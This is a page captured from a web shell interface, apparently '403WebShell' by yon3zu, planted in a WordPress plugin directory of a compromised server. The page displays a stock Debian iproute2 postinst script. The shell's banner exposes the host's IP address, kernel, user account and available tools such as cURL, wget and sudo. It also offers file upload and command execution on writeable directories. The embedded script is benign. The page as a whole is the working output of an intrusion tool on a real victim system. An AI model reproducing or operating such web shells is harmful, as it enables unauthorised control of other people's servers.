Warning: chmod(): Operation not permitted in /var/www/alexvillarreal/wp-content/plugins/custom-post-type-ui/custom-post-type-ui.php on line 8
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.114
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/iproute2.postinst
#!/bin/sh

set -e

# Alternatively this check can be disabled by preseeding:
#   echo "iproute2/setcaps boolean false" | debconf-set-selections

. /usr/share/debconf/confmodule

case "$1" in
    configure)
        if command -v setcap > /dev/null; then
            db_get iproute2/setcaps

            # Allow dpkg-reconfigure to remove caps
            if test "$RET" = "true"; then
                if ! setcap "cap_dac_override,cap_sys_admin,cap_net_admin=ep" /bin/ip; then
                   echo "Setcap failed on /bin/ip, ip vrf exec will not be runnable by non-root" >&2
                fi
            else
                # setcap -r fails if the xattr is not present
                if getcap /bin/ip | grep -qs "/bin/ip"; then
                    if ! setcap "-r" /bin/ip; then
                       echo "Setcap -r failed on /bin/ip, could not remove capabilities" >&2
                    fi
                fi
            fi
        fi
    ;;

    abort-upgrade|abort-remove|abort-deconfigure)
    ;;

    *)
        echo "postinst called with unknown argument \`$1'" >&2
        exit 1
    ;;
esac

# dh_installdeb will replace this with shell code automatically
# generated by other debhelper scripts.



exit 0

Youez - 2016 - github.com/yon3zu
LinuXploit